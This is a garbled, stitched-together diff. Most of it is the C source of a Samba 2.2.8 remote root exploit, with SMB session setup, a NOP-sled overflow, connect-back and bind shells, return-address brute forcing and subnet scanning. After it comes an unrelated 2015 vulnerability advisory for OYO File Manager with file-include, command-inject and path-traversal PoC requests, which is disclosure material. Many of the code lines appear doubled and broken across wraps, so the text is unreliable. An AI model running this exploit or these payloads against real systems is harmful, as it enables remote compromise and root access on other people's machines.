if(getsockopt(fd, SOL_SOCKET, SO_ERROR, &getsockopt_err if(getsockopt(fd, SOL_SOCKET, SO_ERROR, &getsockopt_error, &getsockopt_length) < 0) {
or, &getsockopt_length) < 0) {
errno = ETIMEDOUT; errno = ETIMEDOUT;
close(fd); close(fd);
return -1; return -1;
@ -414,8 +378,7 @@ or, &getsockopt_length) < 0) {
return 1; return 1;
} }
int int read_timer(int fd, unsigned int time_out)
read_timer(int fd, unsigned int time_out)
{ {
/* ripped from no1 */ /* ripped from no1 */
@ -468,8 +431,7 @@ read_timer(int fd, unsigned int time_out)
} }
} }
int int write_timer(int fd, unsigned int time_out)
write_timer(int fd, unsigned int time_out)
{ {
/* ripped from no1 */ /* ripped from no1 */
@ -520,12 +482,10 @@ write_timer(int fd, unsigned int time_out)
} }
void void shell(int sock)
shell(int sock)
{ {
fd_set fd_read; fd_set fd_read;
char buff[1024], *cmd="unset HISTFILE; echo \"*** JE MOET JE MUIL HOUWE char buff[1024], *cmd="unset HISTFILE; echo \"*** JE MOET JE MUIL HOUWE\";uname -a;id;\n";
\";uname -a;id;\n";
int n; int n;
FD_ZERO(&fd_read); FD_ZERO(&fd_read);
@ -567,8 +527,7 @@ shell(int sock)
exit(0); exit(0);
} }
void void handler()
handler()
{ {
int sock = 0; int sock = 0;
int i = 0; int i = 0;
@ -584,8 +543,7 @@ handler()
if(Connect(sock, (char *)inet_ntoa(addr1.sin_addr), 45295, 2) != -1) { if(Connect(sock, (char *)inet_ntoa(addr1.sin_addr), 45295, 2) != -1) {
fprintf(stdout, "+ Worked!\n" fprintf(stdout, "+ Worked!\n"
"---------------------------------------------- "--------------------------------------------------------------\n");
----------------\n");
shell(sock); shell(sock);
close(sock); close(sock);
} }
@ -593,17 +551,13 @@ handler()
} }
int int start_session(int sock)
start_session(int sock)
{ {
char buffer[1000]; char buffer[1000];
char response[4096]; char response[4096];
char session_data1[] = "\x00\xff\x00\x00\x00\x00\x20\x02\x00\x01\x00 char session_data1[] = "\x00\xff\x00\x00\x00\x00\x20\x02\x00\x01\x00\x00\x00\x00";
\x00\x00\x00"; char session_data2[] = "\x00\x00\x00\x00\x5c\x5c\x69\x70\x63\x24\x25\x6e\x6f\x62\x6f\x64\x79"
char session_data2[] = "\x00\x00\x00\x00\x5c\x5c\x69\x70\x63\x24\x25 "\x00\x00\x00\x00\x00\x00\x00\x49\x50\x43\x24";
\x6e\x6f\x62\x6f\x64\x79"
"\x00\x00\x00\x00\x00\x00\x00\x49\x50\x43\x24
";
NETBIOS_HEADER *netbiosheader; NETBIOS_HEADER *netbiosheader;
SMB_HEADER *smbheader; SMB_HEADER *smbheader;
@ -628,8 +582,7 @@ start_session(int sock)
smbheader->uid = 100; smbheader->uid = 100;
smbheader->mid = 0x01; smbheader->mid = 0x01;
memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_da memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data1, sizeof(session_data1) - 1);
ta1, sizeof(session_data1) - 1);
if(write_timer(sock, 3) == 1) if(write_timer(sock, 3) == 1)
if (send(sock, buffer, 50, 0) < 0) return -1; if (send(sock, buffer, 50, 0) < 0) return -1;
@ -642,8 +595,7 @@ ta1, sizeof(session_data1) - 1);
netbiosheader = (NETBIOS_HEADER *)response; netbiosheader = (NETBIOS_HEADER *)response;
smbheader = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER)); smbheader = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER));
if (netbiosheader->type != 0x00) fprintf(stderr, "+ Recieved a non sess if (netbiosheader->type != 0x00) fprintf(stderr, "+ Recieved a non session message\n");
ion message\n");
netbiosheader = (NETBIOS_HEADER *)buffer; netbiosheader = (NETBIOS_HEADER *)buffer;
smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER)); smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));
@ -663,8 +615,7 @@ ion message\n");
smbheader->tid = 0x00; smbheader->tid = 0x00;
smbheader->uid = 100; smbheader->uid = 100;
memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_da memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data2, sizeof(session_data2) - 1);
ta2, sizeof(session_data2) - 1);
if(write_timer(sock, 3) == 1) if(write_timer(sock, 3) == 1)
if (send(sock, buffer, 64, 0) < 0) return -1; if (send(sock, buffer, 64, 0) < 0) return -1;
@ -682,18 +633,14 @@ ta2, sizeof(session_data2) - 1);
return 0; return 0;
} }
int int exploit_normal(int sock, unsigned long ret, char *shellcode)
exploit_normal(int sock, unsigned long ret, char *shellcode)
{ {
char buffer[4000]; char buffer[4000];
char exploit_data[] = char exploit_data[] =
"\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
00\x00\x00" "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x
00\x00\x00\x00"
"\x00\x00\x00\x90"; "\x00\x00\x00\x90";
int i = 0; int i = 0;
@ -719,8 +666,7 @@ exploit_normal(int sock, unsigned long ret, char *shellcode)
smbheader->tid = 0x01; smbheader->tid = 0x01;
smbheader->uid = 100; smbheader->uid = 100;
memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(ex memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000);
ploit_data), 0x90, 3000);
buffer[1096] = 0xEB; buffer[1096] = 0xEB;
buffer[1097] = 0x70; buffer[1097] = 0x70;
@ -742,18 +688,14 @@ ploit_data), 0x90, 3000);
return -1; return -1;
} }
int int exploit_openbsd32(int sock, unsigned long ret, char *shellcode)
exploit_openbsd32(int sock, unsigned long ret, char *shellcode)
{ {
char buffer[4000]; char buffer[4000];
char exploit_data[] = char exploit_data[] =
"\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
00\x00\x00" "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x
00\x00\x00\x00"
"\x00\x00\x00\x90"; "\x00\x00\x00\x90";
int i = 0; int i = 0;
@ -778,8 +720,7 @@ exploit_openbsd32(int sock, unsigned long ret, char *shellcode)
smbheader->tid = 0x01; smbheader->tid = 0x01;
smbheader->uid = 100; smbheader->uid = 100;
memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(ex memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000);
ploit_data), 0x90, 3000);
for (i = 0; i < 4 * 24; i += 4) for (i = 0; i < 4 * 24; i += 4)
memcpy(buffer + 1131 + i, &dummy, 4); memcpy(buffer + 1131 + i, &dummy, 4);
@ -789,8 +730,7 @@ ploit_data), 0x90, 3000);
memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER),
exploit_data, sizeof(exploit_data) - 1); exploit_data, sizeof(exploit_data) - 1);
memcpy(buffer + 1100 - strlen(shellcode), shellcode, strlen(shellcode)) memcpy(buffer + 1100 - strlen(shellcode), shellcode, strlen(shellcode));
;
if(write_timer(sock, 3) == 1) { if(write_timer(sock, 3) == 1) {
if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1; if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1;
@ -801,8 +741,7 @@ ploit_data), 0x90, 3000);
} }
int int main (int argc,char *argv[])
main (int argc,char *argv[])
{ {
char *shellcode = NULL; char *shellcode = NULL;
char scan_ip[256]; char scan_ip[256];
@ -832,10 +771,8 @@ main (int argc,char *argv[])
struct hostent *he; struct hostent *he;
fprintf(stdout, "samba-2.2.8 < remote root exploit by eSDee (www.netric fprintf(stdout, "samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)\n"
.org|be)\n" "--------------------------------------------------------------\n");
"------------------------------------------------------
--------\n");
while((opt = getopt(argc,argv,"b:B:c:C:d:fp:r:sS:t:v")) !=EOF) { while((opt = getopt(argc,argv,"b:B:c:C:d:fp:r:sS:t:v")) !=EOF) {
switch(opt) switch(opt)
@ -843,8 +780,7 @@ main (int argc,char *argv[])
case 'b': case 'b':
brute = atoi(optarg); brute = atoi(optarg);
if ((brute < 0) || (brute > 3)) { if ((brute < 0) || (brute > 3)) {
fprintf(stderr, "Invalid platform.\n\n" fprintf(stderr, "Invalid platform.\n\n");
);
return -1; return -1;
} }
break; break;
@ -853,38 +789,29 @@ main (int argc,char *argv[])
if (STEPS == 0) STEPS++; if (STEPS == 0) STEPS++;
break; break;
case 'c': case 'c':
sscanf(optarg, "%d.%d.%d.%d", &ip1, &ip2, &ip3, sscanf(optarg, "%d.%d.%d.%d", &ip1, &ip2, &ip3, &ip4);
&ip4);
connectback = 1; connectback = 1;
if (ip1 == 0 || ip2 == 0 || ip3 == 0 || ip4 == if (ip1 == 0 || ip2 == 0 || ip3 == 0 || ip4 == 0) {
0) { fprintf(stderr, "Invalid IP address.\n\n");
fprintf(stderr, "Invalid IP address.\n\
n");
return -1; return -1;
} }
linux_connect_back[33] = ip1; bsd_connect_back[ linux_connect_back[33] = ip1; bsd_connect_back[24] = ip1;
24] = ip1; linux_connect_back[34] = ip2; bsd_connect_back[25] = ip2;
linux_connect_back[34] = ip2; bsd_connect_back[ linux_connect_back[35] = ip3; bsd_connect_back[26] = ip3;
25] = ip2; linux_connect_back[36] = ip4; bsd_connect_back[27] = ip4;
linux_connect_back[35] = ip3; bsd_connect_back[
26] = ip3;
linux_connect_back[36] = ip4; bsd_connect_back[
27] = ip4;
break; break;
case 'C': case 'C':
MAX_CHILDS = atoi(optarg); MAX_CHILDS = atoi(optarg);
if (MAX_CHILDS == 0) { if (MAX_CHILDS == 0) {
fprintf(stderr, "Invalid number of chil fprintf(stderr, "Invalid number of childs.\n");
ds.\n");
return -1; return -1;
} }
if (MAX_CHILDS > 99) { if (MAX_CHILDS > 99) {
fprintf(stderr, "Too many childs, using fprintf(stderr, "Too many childs, using 99. \n");
99. \n");
MAX_CHILDS = 99; MAX_CHILDS = 99;
} }
@ -918,13 +845,8 @@ ds.\n");
case 't': case 't':
type = atoi(optarg); type = atoi(optarg);
if (type == 0 || type > sizeof(targets) / 16) { if (type == 0 || type > sizeof(targets) / 16) {
for(i = 0; i < sizeof(targets) / 16; i+ for(i = 0; i < sizeof(targets) / 16; i++)
+) fprintf(stdout, "%02d. %s [0x%08x]\n", i + 1, targets[i].type, (unsigned int) targets[i].ret);
fprintf(stdout, "%02d. %s
[0x%08x]\n", i + 1,
targets[i].type
, (unsigned int) targets[i].ret);
fprintf(stderr, "\n"); fprintf(stderr, "\n");
return -1; return -1;
} }
@ -939,8 +861,7 @@ ds.\n");
} }
if ((argv[optind] == NULL && scan == 0) || (type == 0 && brute == -1 && if ((argv[optind] == NULL && scan == 0) || (type == 0 && brute == -1 && scan == 0))
scan == 0))
usage(argv[0] == NULL ? "sambal" : argv[0]); usage(argv[0] == NULL ? "sambal" : argv[0]);
if (scan == 1) if (scan == 1)
@ -967,20 +888,17 @@ ds.\n");
for (ip4 = 0; ip4 < 255; ip4++) { for (ip4 = 0; ip4 < 255; ip4++) {
i++; i++;
snprintf(scan_ip, sizeof(scan_ip) - 1, "%u.%u.% snprintf(scan_ip, sizeof(scan_ip) - 1, "%u.%u.%u.%u", ip1, ip2, ip3, ip4);
u.%u", ip1, ip2, ip3, ip4);
usleep(BRUTE_DELAY); usleep(BRUTE_DELAY);
switch (fork()) { switch (fork()) {
case 0: case 0:
switch(is_samba(scan_ip, 2)) { switch(is_samba(scan_ip, 2)) {
case 0: case 0:
fprintf(stdout, fprintf(stdout, "+ [%s] Samba\n", scan_ip);
"+ [%s] Samba\n", scan_ip);
break; break;
case 1: case 1:
fprintf(stdout, fprintf(stdout, "+ [%s] Windows\n", scan_ip);
"+ [%s] Windows\n", scan_ip);
break; break;
default: default:
break; break;
@ -989,8 +907,7 @@ u.%u", ip1, ip2, ip3, ip4);
exit(0); exit(0);
break; break;
case -1: case -1:
fprintf(stderr, "+ fork() error fprintf(stderr, "+ fork() error\n");
\n");
exit(-1); exit(-1);
break; break;
default: default:
@ -1022,8 +939,7 @@ u.%u", ip1, ip2, ip3, ip4);
shellcode = targets[type - 1].shellcode; shellcode = targets[type - 1].shellcode;
if (connectback == 1) { if (connectback == 1) {
fprintf(stdout, "+ connecting back to: [%d.%d.%d.%d:452 fprintf(stdout, "+ connecting back to: [%d.%d.%d.%d:45295]\n",
95]\n",
ip1, ip2, ip3, ip4); ip1, ip2, ip3, ip4);
switch(targets[type - 1].os_type) { switch(targets[type - 1].os_type) {
@ -1061,31 +977,26 @@ u.%u", ip1, ip2, ip3, ip4);
addr2.sin_family = AF_INET; addr2.sin_family = AF_INET;
addr2.sin_port = htons(45295); addr2.sin_port = htons(45295);
if (connect(sock, (struct sockaddr *)&addr1, sizeof(addr1)) == if (connect(sock, (struct sockaddr *)&addr1, sizeof(addr1)) == -1) {
-1) {
fprintf(stderr, "+ connect() error.\n"); fprintf(stderr, "+ connect() error.\n");
return -1; return -1;
} }
if (verbose == 1) fprintf(stdout, "+ %s\n", targets[type - 1].t if (verbose == 1) fprintf(stdout, "+ %s\n", targets[type - 1].type);
ype);
if (force == 0) { if (force == 0) {
if (is_samba(argv[optind], 2) != 0) { if (is_samba(argv[optind], 2) != 0) {
fprintf(stderr, "+ Host is not running samba!\n fprintf(stderr, "+ Host is not running samba!\n\n");
\n");
return -1; return -1;
} }
fprintf(stderr, "+ Host is running samba.\n"); fprintf(stderr, "+ Host is running samba.\n");
} }
if (verbose == 1) fprintf(stdout, "+ Connected to [%s:%d]\n", ( if (verbose == 1) fprintf(stdout, "+ Connected to [%s:%d]\n", (char *)inet_ntoa(addr1.sin_addr), port);
char *)inet_ntoa(addr1.sin_addr), port);
if (start_session(sock) < 0) fprintf(stderr, "+ Session failed. if (start_session(sock) < 0) fprintf(stderr, "+ Session failed.\n");
\n");
if (verbose == 1) fprintf(stdout, "+ Session enstablished\n"); if (verbose == 1) fprintf(stdout, "+ Session enstablished\n");
sleep(5); sleep(5);
@ -1104,16 +1015,13 @@ char *)inet_ntoa(addr1.sin_addr), port);
sleep(2); sleep(2);
if (connectback == 0) { if (connectback == 0) {
if(connect(sock2, (struct sockaddr *)&addr2, sizeof(add if(connect(sock2, (struct sockaddr *)&addr2, sizeof(addr2)) == -1) {
r2)) == -1) { fprintf(stderr, "+ Exploit failed, try -b to bruteforce.\n");
fprintf(stderr, "+ Exploit failed, try -b to br
uteforce.\n");
return -1; return -1;
} }
fprintf(stdout, "-------------------------------------- fprintf(stdout, "--------------------------------------------------------------\n");
------------------------\n");
shell(sock2); shell(sock2);
close(sock); close(sock);
@ -1138,20 +1046,17 @@ uteforce.\n");
case 1: case 1:
if (ret == 0) ret = 0xbfc00000; if (ret == 0) ret = 0xbfc00000;
shellcode = bsd_bindcode; shellcode = bsd_bindcode;
fprintf(stdout, "+ Bruteforce mode. (FreeBSD / NetBSD)\ fprintf(stdout, "+ Bruteforce mode. (FreeBSD / NetBSD)\n");
n");
break; break;
case 2: case 2:
if (ret == 0) ret = 0xdfc00000; if (ret == 0) ret = 0xdfc00000;
shellcode = bsd_bindcode; shellcode = bsd_bindcode;
fprintf(stdout, "+ Bruteforce mode. (OpenBSD 3.1 and pr fprintf(stdout, "+ Bruteforce mode. (OpenBSD 3.1 and prior)\n");
ior)\n");
break; break;
case 3: case 3:
if (ret == 0) ret = 0x00170000; if (ret == 0) ret = 0x00170000;
shellcode = bsd_bindcode; shellcode = bsd_bindcode;
fprintf(stdout, "+ Bruteforce mode. (OpenBSD 3.2 - non- fprintf(stdout, "+ Bruteforce mode. (OpenBSD 3.2 - non-exec stack)\n");
exec stack)\n");
break; break;
} }
@ -1182,8 +1087,7 @@ exec stack)\n");
if (sock2 > 2) close(sock2); if (sock2 > 2) close(sock2);
if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) { if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
if (verbose == 1) fprintf(stderr, "+ socket() error.\n" if (verbose == 1) fprintf(stderr, "+ socket() error.\n");
);
} }
else { else {
ret -= STEPS; ret -= STEPS;
@ -1191,21 +1095,18 @@ exec stack)\n");
} }
if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0) if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0)
if (verbose == 1) fprintf(stderr, "+ socket() error.\n" if (verbose == 1) fprintf(stderr, "+ socket() error.\n");
);
if ((ret & 0xff) == 0x00 && brute != 3) ret++; if ((ret & 0xff) == 0x00 && brute != 3) ret++;
if (verbose == 1) fprintf(stdout, "+ Using ret: [0x%08x]\n", (u if (verbose == 1) fprintf(stdout, "+ Using ret: [0x%08x]\n", (unsigned int)ret);
nsigned int)ret);
usleep(BRUTE_DELAY); usleep(BRUTE_DELAY);
switch (childs[i] = fork()) { switch (childs[i] = fork()) {
case 0: case 0:
if(Connect(sock, (char *)inet_ntoa(addr1.sin_ad if(Connect(sock, (char *)inet_ntoa(addr1.sin_addr), port, 2) == -1) {
dr), port, 2) == -1) {
if (sock > 2) close(sock); if (sock > 2) close(sock);
if (sock2 > 2) close(sock2); if (sock2 > 2) close(sock2);
exit(-1); exit(-1);
@ -1213,30 +1114,23 @@ dr), port, 2) == -1) {
if(write_timer(sock, 3) == 1) { if(write_timer(sock, 3) == 1) {
if (start_session(sock) < 0) { if (start_session(sock) < 0) {
if (verbose == 1) fprintf(stder if (verbose == 1) fprintf(stderr, "+ Session failed.\n");
r, "+ Session failed.\n");
if (sock > 2)close(sock); if (sock > 2)close(sock);
if (sock2 > 2) close(sock2); if (sock2 > 2) close(sock2);
exit(-1); exit(-1);
} }
if (brute == 3) { if (brute == 3) {
if (exploit_openbsd32(sock, ret if (exploit_openbsd32(sock, ret, shellcode) < 0) {
, shellcode) < 0) { if (verbose == 1) fprintf(stderr, "+ Failed.\n");
if (verbose == 1) fprin if (sock > 2) close(sock);
tf(stderr, "+ Failed.\n"); if (sock2 > 2) close(sock2);
if (sock > 2) close(so
ck);
if (sock2 > 2) close(so
ck2);
exit(-1); exit(-1);
} }
} }
else { else {
if (exploit_normal(sock, ret, shellcode if (exploit_normal(sock, ret, shellcode) < 0) {
) < 0) { if (verbose == 1) fprintf(stderr, "+ Failed.\n");
if (verbose == 1) fprintf(stder
r, "+ Failed.\n");
if (sock > 2) close(sock); if (sock > 2) close(sock);
if (sock2 > 2) close(sock2); if (sock2 > 2) close(sock2);
exit(-1); exit(-1);
@ -1244,14 +1138,12 @@ r, "+ Failed.\n");
if (sock > 2) close(sock); if (sock > 2) close(sock);
if ((sock2 = socket(AF_INET, SOCK_STREA if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
M, 6)) < 0) {
if (sock2 > 2) close(sock2); if (sock2 > 2) close(sock2);
exit(-1); exit(-1);
} }
if(Connect(sock2, (char *)inet_ntoa(add if(Connect(sock2, (char *)inet_ntoa(addr1.sin_addr), 45295, 2) != -1) {
r1.sin_addr), 45295, 2) != -1) {
if (sock2 > 2) close(sock2); if (sock2 > 2) close(sock2);
kill(getppid(), SIGUSR1); kill(getppid(), SIGUSR1);
} }


@ -0,0 +1,355 @@
Document Title:
===============
OYO File Manager 1.1 iOS&Android - Multiple Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1494
Release Date:
=============
2015-05-18
Vulnerability Laboratory ID (VL-ID):
====================================
1493
Common Vulnerability Scoring System:
====================================
6.9
Product & Service Introduction:
===============================
OYO File Manager, helps you to manage files in your mobile from your computer over wifi, without USB cable. Also, view your photo albums, play songs and videos.
Store files in drive page and do all the file operations, such as Create, Move, Delete, Edit, Copy, Rename, Zip, unzip, and get information about file.
(Copy of the Vendor Homepage: https://itunes.apple.com/us/app/oyo-file-manager/id981145759 & https://play.google.com/store/apps/details?id=com.whatbig.filemanager )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research team discovered multiple Vulnerabilities in the official OYO File Manager v1.1 iOS & Android mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2015-05-18: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Balaji Rajan
Product: OYO File Manager - iOS & Android 1.1
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
1.1 Local File Include Vulnerability
A local file include web vulnerability has been discovered in the official OYO File Manager v1.1 iOS & Android mobile web-application.
The file include vulnerability allows remote attackers to unauthorized include local file/path requests to compromise the mobile web-application.
The web vulnerability is located in the `filename` value of the `upload(GCDWebUploader)` module. Attackers are able to inject own files with malicious
`filename` values in the `upload` POST method request to compromise the mobile web-application. The local file/path include execution occcurs in
the index file dir listing and sub folders of the wifi interface. The attacker is able to inject the local file include request by usage of the
`wifi interface` in connection with the vulnerable file upload POST method request. Injects are also possible via local file sync function.
Local attackers are also able to exploit the filename issue in combination with persistent injected script code to execute different malicious
attack requests.
The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.5.
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account.
Successful exploitation of the local file include vulnerability results in mobile application compromise or connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] upload (GCDWebUploader)
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir Listing (http://localhost:8080/)
1.2 Local Command Injection Vulnerability
A local command inject web vulnerability has been discovered in the official OYO File Manager v1.1 iOS & Android mobile web-application.
The issue allows remote attackers to inject own commands by usage of stable device values to compromise the ios or android mobile web-application.
The command inject vulnerability is located in the vulnerable `devicename` value of the `index` module. Local attackers are able to inject own
own malicious system specific commands to requests the vulnerable `devicename` value. The devicename value is displayed in the header location
of the file dir index module. The execution point is in the main index context and the injection point is the local device to app sync.
The attack vector is located on the application-side and the injection requires physical device access or a local low privileged device user account.
Local attackers are also able to exploit the devicename validation issue in combination with persistent injected script codes.
The security risk of the local command/path inject vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 5.6.
Exploitation of the command/path inject vulnerability requires a low privileged ios/android device account with restricted access and no user interaction.
Successful exploitation of the vulnerability results in unauthorized execution of system specific commands to compromise the mobile Android/iOS application
or the connected device components.
Request Method(s):
[+] [SYNC]
Vulnerable Module(s):
[+] Path Listing
Vulnerable Parameter(s):
[+] devicename
1.3 Remote Path Traversal Vulnerability
A Path Traveral web vulnerability has been discovered in the official OYO File Manager v1.1 iOS & Android mobile web-application.
The security vulnerability allows remote attackers to unauthorized request system path variables to compromise the mobile application or device.
The vulnerability is located in the `path` value of the `open and list` interface module. Remote attackers are able to change the path variable
to unauthorized request device files or directories. The vulnerability can be exploited by local or remote attackers without user interaction.
The attack vector is located on the application-side of the service and the request method to execute is GET (client-side).
The security risk of the path traversal web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.9.
Exploitation of the directory traversal web vulnerability requires no privileged application user account or user interaction.
Successful exploitation of the vulnerability results in mobile application compromise.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] open
[+] list
Vulnerable Parameter(s):
[+] path
Affected Module(s):
[+] Index File Dir Listing (http://localhost:8080/)
Proof of Concept (PoC):
=======================
1.1
The file include web vulnerability can be exploited by local attackers without privileged application user account or user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Open the interface
2. Start a session tamper
3. Upload a reandom file
4. Change in the upload POST method request the vulnerable filename to a local file variable
Note: The website reloads
5. The execution occurs in the main file dir index were the upload has been replaced
6. Successful reproduce of the mobile web vulnerability!
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost/upload
Load Flags[LOAD_BYPASS_CACHE ] Größe des Inhalts[2] Mime Type[application/json]
Request Header:
Host[localhost]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost/]
Content-Length[831]
Content-Type[multipart/form-data; boundary=---------------------------33361466725643]
Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]
POST-Daten:
POST_DATA[-----------------------------33361466725643
Content-Disposition: form-data; name="path"/test23/
-----------------------------33361466725643
Content-Disposition: form-data; name="files[]"; filename="../[LOCAL FILE INCLUDE VULNERABILITY!]testfile.png"
Content-Type: image/png
- Response
Status=OK - 200
Server=GCDWebUploader
Cache-Control=no-cache
Content-Length=2
Content-Type=application/json
Connection=Close
Date=Tue, 12 May 2015 12:24:23 GMT
Reference(s):
http://localhost/upload
1.2
The local command inject web vulnerability can be exploited by local attackers with low privilege application user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Install the android or ios application to your device
2. Start the application
3. Change the local devicename value in the ios settings to a own payload string (local command inject)
4. Save the settings
5. Open the wifi interface and watch the index webserver site
6. The execution occurs in the header location of the webpage were the devicename value is visible
6. Successful reproduce of the mobile web vulnerability!
PoC:
<spna><img src="img/OYO.png" alt="OYO" style="margin-left:-30px;" height="87" width="87"><span> </span>
<span style="font-size:20px;">[LOCAL COMMAND INJECT VULNERABILITY!]23</span> <span style="font-size: 15px;color: #CCCCCC;">IOS Version 8.3</span>
<span style="float:right;font-size:18px;width:400px;">
<div class="progress">
<div class="progress-bar progress-bar-success" role="progressbar" aria-valuenow="1394098176.00" aria-valuemin="0" aria-valuemax="12.74" style="width:95.22%">
25.89 GB used</div>
<!-- <span style="font-size:10px;padding-left:20px;padding-bottom:5px;"> 1.30 GB Free Space</span>-->
<!-- Drag & drop files OR Just upload your Files-->
<div class="progress-bar progress-bar-warning" role="progressbar" aria-valuenow="25.89 GB" aria-valuemin="0" aria-valuemax="12.74" style="width:4.78%">
1.30 GB free space
</div></div></span></spna>
1.3
the path traversal web vulnerability can be exploited by remote attackers without user interaction or privilege web application user account.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: Payload(s)
http://localhost/list?path=%2F%22%3E%3C../../../../../[DIRECTORY TRAVERSAL]%3E/
http://localhost/open?path=%2F%22%3E%3C../../../../../[DIRECTORY TRAVERSAL]%3E/
http://localhost/download?path=%2F%22%3E%3C../../../../../[DIRECTORY TRAVERSAL]%3E/
--- PoC Session Logs [GET] ---
Status: 200[OK]
GET http://localhost/list?path=%2F%22%3E%3C../../../../../[DIRECTORY TRAVERSAL]%3E/PENG.png
Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[59] Mime Type[application/json]
Request Header:
Host[localhost]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost/]
Connection[keep-alive]
Response Header:
Server[GCDWebUploader]
Cache-Control[no-cache]
Content-Length[59]
Content-Type[application/json]
Connection[Close]
Date[Tue, 12 May 2015 12:24:25 GMT]
14:21:43.214[9ms][total 9ms] Status: 200[OK]
GET http://localhost/open?path=/%22%3E%3C../../../../../[DIRECTORY TRAVERSAL]%3E/PENG.png Load Flags[LOAD_NORMAL] Größe des Inhalts[538] Mime Type[image/png]
Request Header:
Host[localhost]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost/]
Connection[keep-alive]
Response Header:
Etag[8831597/1431433463/0]
Last-Modified[Tue, 12 May 2015 12:24:23 GMT]
Server[GCDWebUploader]
Content-Type[image/png]
Content-Length[538]
Connection[Close]
Date[Tue, 12 May 2015 12:24:25 GMT]
Cache-Control[no-cache]
Reference(s):
http://localhost/list?path=
http://localhost/open?path=
http://localhost/download?path=
Solution - Fix & Patch:
=======================
1.1
The local file include web vulnerability can be patched by a secure parse and encode of the vulnerable filename value in the upload POST method request.
Restrict the input and disallow special chars. Parse the output in the file dir index list to prevent local file include attacks via upload.
1.2
Restrict the devicename value and disallow special chars. Encode the devicename value to prevent local command injection attacks.
1.3
The directory traversal web vulnerability can be patched by a secure restriction and parse of the path name value in the open and list module context.
